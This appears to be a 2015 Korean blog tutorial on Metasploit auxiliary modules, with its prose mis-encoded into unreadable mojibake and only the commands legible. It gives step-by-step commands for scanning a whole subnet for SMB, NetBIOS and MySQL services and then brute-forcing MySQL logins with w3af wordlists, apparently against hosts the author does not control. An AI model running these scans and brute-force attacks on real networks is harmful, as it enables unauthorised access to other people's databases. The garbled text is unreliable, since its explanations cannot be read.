ํฌํธ์ค์บ๋์ ๊ดํ ์ด์ผ๊ธฐ๋ฅผ ๊ณ์ํ๊ฒ ์ต๋๋ค.
์์์ ๋งํ๊ฑฐ์ ๊ฐ์ด ํฌํธ์ค์บ๋์๋ nmap ๊ฐ์ด ์ ๋ช ํ ๋๊ตฌ๊ฐ ์์ต๋๋ค.
์ฐ๋ฆฌ๋ msf ๋ณด์กฐ๊ธฐ๋ฅ์ ์ด์ฉํด๋ณด๊ฒ ์ต๋๋ค.
1. use auxiliary/scanner/smb/smb_version
2. set rhosts 192.168.32.0/24
192.168.32.0/24๋ฅผ ์ด์ฉํด ๋์ญ์ ์ค์บํ๋ ๊ฒ์ด๋ค.
3. set threads 256
์ด๋ฌ๊ฒ ํจ์ผ๋ก run์ ํ ์ ์๋ค.
์ฌ๊ธฐ์ ์กฐ๊ธ๋ ์์ธํ ์๊ณ ์ถ๊ณ ์์ดํผ๋ฅผ ์๋ค๋ฉด
1. use auxiliary/scanner/netbios/nbname
2. set rhosts IP
3. set threads 256
์ด๋ ๊ฒ ํ๋ฉด run์ ํ ์ ์๋ค.
IP๋์ญ์ ์ด์ฉํ์ฌ mysql ํ์ํ๋ ๋ฐฉ๋ฒ
1. use auxiliary/scanner/mysql/mtsql_version
2. set rhosts IP
์ด๋ ๊ฒ ์์ดํผ ๋์ญ์ ์ก์์ฃผ๊ณ
3. set rport 3306
sql ํฌํธ๋ฅผ ์ง์ ํด์ค๋ค.
4. set threads 256
์ด๋ ๊ฒ ํ๋ฉด ์ค๋น ๋!!!
์ด๋ ๊ฒ ๋์จ๋ค. ๋๊ตฌ๊ป์ง ๋ชจ๋ฅธ๋ค...
์ด๋ฅผ ๊ณต๊ฒฉํด๋ณด๊ธฐ ๋ฌด์ฐจ๋ณ ๊ณต๊ฒฉ์ ํด๋ณด์
1. use auxiliary/scanner/mysql/mysql_login
2. set rhosts IP
3. set rport 3306
4. set user_file /tmp/users.txt
์ด๋ ๋ฌด์ฐจ๋ณ ๊ณต๊ฒฉ ํ๊ธฐ์ํด ์ ์ ์์ด๋์ ์ฌ์ ํ์ผ์ ๋ฑ๋กํด์ฃผ๋ ๊ฒ์ด๋ค.
๊ธฐ๋ณธ์ ์ผ๋ก๋ (cp /usr/share/w3af/w3af/core/controllers/bruteforce/users.txt /tmp/ <=๋ช ๋ น์ด์ด์ฉํ์ฌ tmp๋ก ์ด๋์์ผ์ผํจ) = passwords.txt๋ ๋์ผ
5. set pass_file /tmp/passwords.txt
6. set stop_on_success true
๊ฒฐ๊ณผ๊ฐ์ด true๊ฐ ๋จ๋ฉด ๋ฉ์ถ๋ผ๋ ๋ช ๋ น์ด์ด๋ค.
7. set threads 256
์ค๋น๋์ธ๋ฐ...
์์๋ ๊น?
์ด์ ๋ ์ง์๋์ง ์๋ ๋ฒ์ ๋์์ด๋์ ,,,
'Metasploit' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
msfvenom (0) | 2015.12.06 |
---|---|
msf ์ด์ฉํ๊ธฐ // beEF ์ฌ์ฉ๋ฒ (0) | 2015.12.06 |
Arp Spoofing & DNS Spoofing (0) | 2015.12.06 |
msfconsole ์ด์ฉํ๊ธฐ (0) | 2015.12.01 |
kali linux ์์์ msf (0) | 2015.12.01 |
๋๊ธ